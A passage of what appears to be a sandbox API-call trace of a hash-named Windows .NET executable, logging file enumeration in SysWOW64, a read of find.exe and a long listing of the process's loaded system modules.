cFileName="SystemPropertiesDataExecutionPrevention.exe", cAlternateFileName="")) returned 1 [0108.003] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3168bac6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3168bac6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3168bac6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14400, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemPropertiesHardware.exe", cAlternateFileName="")) returned 1 [0108.003] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x324412f4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x324412f4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x324412f4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14400, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemPropertiesPerformance.exe", cAlternateFileName="")) returned 1 [0108.003] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3153459f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3153459f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3153459f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14400, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemPropertiesProtection.exe", cAlternateFileName="")) returned 1 [0108.066] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ea98) returned 1 [0108.066] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19eaa4) returned 1 [0108.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\find.exe", nBufferLength=0x105, lpBuffer=0x19e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\find.exe", lpFilePart=0x0) returned 0x1c [0108.071] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19e9f8) returned 1 [0108.072] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x324 [0108.180] GetFileType (hFile=0x324) returned 0x1 [0108.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19e9f4) returned 1 [0108.180] GetFileSize (in: hFile=0x324, lpFileSizeHigh=0x19eaf4 | out: lpFileSizeHigh=0x19eaf4*=0x0) returned 0x3c00 [0108.181] ReadFile (in: hFile=0x324, lpBuffer=0x23e0cf8, nNumberOfBytesToRead=0x3c00, lpNumberOfBytesRead=0x19eaa0, lpOverlapped=0x0 | out: lpBuffer=0x23e0cf8*, lpNumberOfBytesRead=0x19eaa0*=0x3c00, lpOverlapped=0x0) returned 1 [0108.220] CloseHandle (hObject=0x324) returned 1 [0108.373] GetACP () returned 0x4e4 [0108.390] GetCurrentProcessId () returned 0x139c [0108.415] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x139c) returned 0x32c [0108.417] EnumProcessModules (in: hProcess=0x32c, lphModule=0x240cb70, cb=0x100, lpcbNeeded=0x19eae0 | out: lphModule=0x240cb70, lpcbNeeded=0x19eae0) returned 1 [0108.419] GetModuleInformation (in: hProcess=0x32c, hModule=0x400000, lpmodinfo=0x240ccb0, cb=0xc | out: lpmodinfo=0x240ccb0*(lpBaseOfDll=0x400000, SizeOfImage=0x178000, EntryPoint=0x0)) returned 1 [0108.419] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.419] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x400000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe") returned 0x44 [0108.420] CoTaskMemFree (pv=0x6b7260) [0108.421] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.421] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x400000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe")) returned 0x62 [0108.421] CoTaskMemFree (pv=0x6b7260) [0108.421] GetModuleInformation (in: hProcess=0x32c, hModule=0x771d0000, lpmodinfo=0x240eef0, cb=0xc | out: lpmodinfo=0x240eef0*(lpBaseOfDll=0x771d0000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 1 [0108.422] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.422] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x771d0000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0108.422] CoTaskMemFree (pv=0x6b7260) [0108.422] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.422] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x771d0000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0108.422] CoTaskMemFree (pv=0x6b7260) [0108.422] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f8b0000, lpmodinfo=0x2410ff4, cb=0xc | out: lpmodinfo=0x2410ff4*(lpBaseOfDll=0x6f8b0000, SizeOfImage=0x59000, EntryPoint=0x6f8c0780)) returned 1 [0108.422] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.423] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f8b0000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0108.423] CoTaskMemFree (pv=0x6b7260) [0108.423] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.423] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f8b0000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0108.423] CoTaskMemFree (pv=0x6b7260) [0108.423] GetModuleInformation (in: hProcess=0x32c, hModule=0x76720000, lpmodinfo=0x2413100, cb=0xc | out: lpmodinfo=0x2413100*(lpBaseOfDll=0x76720000, SizeOfImage=0xe0000, EntryPoint=0x76733980)) returned 1 [0108.423] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.423] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76720000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0108.424] CoTaskMemFree (pv=0x6b7260) [0108.424] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.424] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76720000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0108.424] CoTaskMemFree (pv=0x6b7260) [0108.424] GetModuleInformation (in: hProcess=0x32c, hModule=0x76910000, lpmodinfo=0x2415214, cb=0xc | out: lpmodinfo=0x2415214*(lpBaseOfDll=0x76910000, SizeOfImage=0x17e000, EntryPoint=0x769c1b90)) returned 1 [0108.424] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.424] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76910000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0108.425] CoTaskMemFree (pv=0x6b7260) [0108.425] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.425] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76910000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0108.425] CoTaskMemFree (pv=0x6b7260) [0108.425] GetModuleInformation (in: hProcess=0x32c, hModule=0x73e50000, lpmodinfo=0x241735c, cb=0xc | out: lpmodinfo=0x241735c*(lpBaseOfDll=0x73e50000, SizeOfImage=0x92000, EntryPoint=0x73e90380)) returned 1 [0108.426] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.426] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73e50000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0108.426] CoTaskMemFree (pv=0x6b7260) [0108.426] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.426] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73e50000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0108.426] CoTaskMemFree (pv=0x6b7260) [0108.426] GetModuleInformation (in: hProcess=0x32c, hModule=0x76600000, lpmodinfo=0x2419468, cb=0xc | out: lpmodinfo=0x2419468*(lpBaseOfDll=0x76600000, SizeOfImage=0x7b000, EntryPoint=0x7661e970)) returned 1 [0108.484] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.484] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76600000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0108.485] CoTaskMemFree (pv=0x6b7260) [0108.485] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.485] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76600000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0108.485] CoTaskMemFree (pv=0x6b7260) [0108.485] GetModuleInformation (in: hProcess=0x32c, hModule=0x76a90000, lpmodinfo=0x241b57c, cb=0xc | out: lpmodinfo=0x241b57c*(lpBaseOfDll=0x76a90000, SizeOfImage=0xbe000, EntryPoint=0x76ac5630)) returned 1 [0108.486] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.486] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76a90000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0108.486] CoTaskMemFree (pv=0x6b7260) [0108.486] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.486] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76a90000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0108.486] CoTaskMemFree (pv=0x6b7260) [0108.486] GetModuleInformation (in: hProcess=0x32c, hModule=0x76cb0000, lpmodinfo=0x241d688, cb=0xc | out: lpmodinfo=0x241d688*(lpBaseOfDll=0x76cb0000, SizeOfImage=0x44000, EntryPoint=0x76cc9d80)) returned 1 [0108.487] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.487] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76cb0000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0108.487] CoTaskMemFree (pv=0x6b7260) [0108.487] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.487] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76cb0000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0108.488] CoTaskMemFree (pv=0x6b7260) [0108.488] GetModuleInformation (in: hProcess=0x32c, hModule=0x76c00000, lpmodinfo=0x241f7e0, cb=0xc | out: lpmodinfo=0x241f7e0*(lpBaseOfDll=0x76c00000, SizeOfImage=0xad000, EntryPoint=0x76c14f00)) returned 1 [0108.488] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.488] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76c00000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0108.489] CoTaskMemFree (pv=0x6b7260) [0108.489] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.489] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76c00000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0108.489] CoTaskMemFree (pv=0x6b7260) [0108.489] GetModuleInformation (in: hProcess=0x32c, hModule=0x73f00000, lpmodinfo=0x24218ec, cb=0xc | out: lpmodinfo=0x24218ec*(lpBaseOfDll=0x73f00000, SizeOfImage=0x1e000, EntryPoint=0x73f0b640)) returned 1 [0108.490] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.490] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73f00000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0108.490] CoTaskMemFree (pv=0x6b7260) [0108.490] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.490] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73f00000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0108.490] CoTaskMemFree (pv=0x6b7260) [0108.491] GetModuleInformation (in: hProcess=0x32c, hModule=0x73ef0000, lpmodinfo=0x24239f8, cb=0xc | out: lpmodinfo=0x24239f8*(lpBaseOfDll=0x73ef0000, SizeOfImage=0xa000, EntryPoint=0x73ef2a00)) returned 1 [0108.491] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.491] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73ef0000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0108.491] CoTaskMemFree (pv=0x6b7260) [0108.491] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.491] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73ef0000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0108.492] CoTaskMemFree (pv=0x6b7260) [0108.492] GetModuleInformation (in: hProcess=0x32c, hModule=0x76840000, lpmodinfo=0x2425b0c, cb=0xc | out: lpmodinfo=0x2425b0c*(lpBaseOfDll=0x76840000, SizeOfImage=0x58000, EntryPoint=0x768825c0)) returned 1 [0108.492] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.492] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76840000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0108.493] CoTaskMemFree (pv=0x6b7260) [0108.493] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.493] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76840000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0108.493] CoTaskMemFree (pv=0x6b7260) [0108.493] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f910000, lpmodinfo=0x2427c40, cb=0xc | out: lpmodinfo=0x2427c40*(lpBaseOfDll=0x6f910000, SizeOfImage=0x7d000, EntryPoint=0x6f920db0)) returned 1 [0108.494] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.494] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f910000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0108.494] CoTaskMemFree (pv=0x6b7260) [0108.494] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.494] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f910000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0108.495] CoTaskMemFree (pv=0x6b7260) [0108.495] GetModuleInformation (in: hProcess=0x32c, hModule=0x76d00000, lpmodinfo=0x2429d88, cb=0xc | out: lpmodinfo=0x2429d88*(lpBaseOfDll=0x76d00000, SizeOfImage=0x45000, EntryPoint=0x76d1de90)) returned 1 [0108.495] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.495] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76d00000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0108.496] CoTaskMemFree (pv=0x6b7260) [0108.496] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.496] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76d00000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0108.496] CoTaskMemFree (pv=0x6b7260) [0108.496] GetModuleInformation (in: hProcess=0x32c, hModule=0x762b0000, lpmodinfo=0x242be94, cb=0xc | out: lpmodinfo=0x242be94*(lpBaseOfDll=0x762b0000, SizeOfImage=0x1bd000, EntryPoint=0x76392a10)) returned 1 [0108.497] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.497] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x762b0000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0108.497] CoTaskMemFree (pv=0x6b7260) [0108.497] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.497] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x762b0000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0108.498] CoTaskMemFree (pv=0x6b7260) [0108.498] GetModuleInformation (in: hProcess=0x32c, hModule=0x74ab0000, lpmodinfo=0x242dfa0, cb=0xc | out: lpmodinfo=0x242dfa0*(lpBaseOfDll=0x74ab0000, SizeOfImage=0x14f000, EntryPoint=0x74b66820)) returned 1 [0108.498] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.498] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74ab0000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0108.499] CoTaskMemFree (pv=0x6b7260) [0108.499] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.499] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74ab0000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0108.500] CoTaskMemFree (pv=0x6b7260) [0108.500] GetModuleInformation (in: hProcess=0x32c, hModule=0x743d0000, lpmodinfo=0x2430130, cb=0xc | out: lpmodinfo=0x2430130*(lpBaseOfDll=0x743d0000, SizeOfImage=0x147000, EntryPoint=0x743e1cf0)) returned 1 [0108.500] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.500] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x743d0000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0108.501] CoTaskMemFree (pv=0x6b7260) [0108.501] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.501] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x743d0000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0108.501] CoTaskMemFree (pv=0x6b7260) [0108.501] GetModuleInformation (in: hProcess=0x32c, hModule=0x741b0000, lpmodinfo=0x243223c, cb=0xc | out: lpmodinfo=0x243223c*(lpBaseOfDll=0x741b0000, SizeOfImage=0x2b000, EntryPoint=0x741b5680)) returned 1 [0108.502] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.502] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x741b0000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0108.502] CoTaskMemFree (pv=0x6b7260) [0108.502] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.502] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x741b0000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: "c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0108.503] CoTaskMemFree (pv=0x6b7260) [0108.503] GetModuleInformation (in: hProcess=0x32c, hModule=0x76d50000, lpmodinfo=0x2434340, cb=0xc | out: lpmodinfo=0x2434340*(lpBaseOfDll=0x76d50000, SizeOfImage=0xc000, EntryPoint=0x76d53930)) returned 1 [0108.504] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.504] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76d50000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0108.504] CoTaskMemFree (pv=0x6b7260) [0108.504] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.504] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76d50000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0108.505] CoTaskMemFree (pv=0x6b7260) [0108.505] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f8a0000, lpmodinfo=0x243646c, cb=0xc | out: lpmodinfo=0x243646c*(lpBaseOfDll=0x6f8a0000, SizeOfImage=0x8000, EntryPoint=0x6f8a17b0)) returned 1 [0108.506] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.506] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f8a0000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0108.506] CoTaskMemFree (pv=0x6b7260) [0108.506] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.506] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f8a0000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0108.507] CoTaskMemFree (pv=0x6b7260) [0108.507] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f1b0000, lpmodinfo=0x2438578, cb=0xc | out: lpmodinfo=0x2438578*(lpBaseOfDll=0x6f1b0000, SizeOfImage=0x6e1000, EntryPoint=0x6f1dcd70)) returned 1 [0108.507] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.507] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f1b0000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0108.508] CoTaskMemFree (pv=0x6b7260) [0108.508] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.508] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f1b0000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0108.509] CoTaskMemFree (pv=0x6b7260) [0108.509] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f0b0000, lpmodinfo=0x243a6a8, cb=0xc | out: lpmodinfo=0x243a6a8*(lpBaseOfDll=0x6f0b0000, SizeOfImage=0xf5000, EntryPoint=0x6f104160)) returned 1 [0108.509] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.509] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f0b0000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="MSVCR120_CLR0400.dll") returned 0x14 [0108.510] CoTaskMemFree (pv=0x6b7260) [0108.510] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.510] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f0b0000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSVCR120_CLR0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")) returned 0x28 [0108.511] CoTaskMemFree (pv=0x6b7260) [0108.511] GetModuleInformation (in: hProcess=0x32c, hModule=0x6d400000, lpmodinfo=0x243c7dc, cb=0xc | out: lpmodinfo=0x243c7dc*(lpBaseOfDll=0x6d400000, SizeOfImage=0x12b2000, EntryPoint=0x0)) returned 1 [0108.511] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.511] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6d400000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0108.512] CoTaskMemFree (pv=0x6b7260) [0108.512] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.512] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6d400000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll")) returned 0x68 [0108.512] CoTaskMemFree (pv=0x6b7260) [0108.512] GetModuleInformation (in: hProcess=0x32c, hModule=0x74dc0000, lpmodinfo=0x243e984, cb=0xc | out: lpmodinfo=0x243e984*(lpBaseOfDll=0x74dc0000, SizeOfImage=0xeb000, EntryPoint=0x74dfd650)) returned 1 [0108.513] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.513] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74dc0000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0108.514] CoTaskMemFree (pv=0x6b7260) [0108.514] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.514] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74dc0000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0108.514] CoTaskMemFree (pv=0x6b7260) [0108.514] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f030000, lpmodinfo=0x2440a88, cb=0xc | out: lpmodinfo=0x2440a88*(lpBaseOfDll=0x6f030000, SizeOfImage=0x80000, EntryPoint=0x6f031180)) returned 1 [0108.515] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.515] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f030000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0108.516] CoTaskMemFree (pv=0x6b7260) [0108.516] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.516] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f030000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0108.516] CoTaskMemFree (pv=0x6b7260) [0108.516] GetModuleInformation (in: hProcess=0x32c, hModule=0x76680000, lpmodinfo=0x2442bc8, cb=0xc | out: lpmodinfo=0x2442bc8*(lpBaseOfDll=0x76680000, SizeOfImage=0x92000, EntryPoint=0x766b8cf0)) returned 1 [0108.517] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.517] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76680000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0108.518] CoTaskMemFree (pv=0x6b7260) [0108.518] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.518] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76680000, lpFilename=0x6b7260, nSize=0x800 | out: 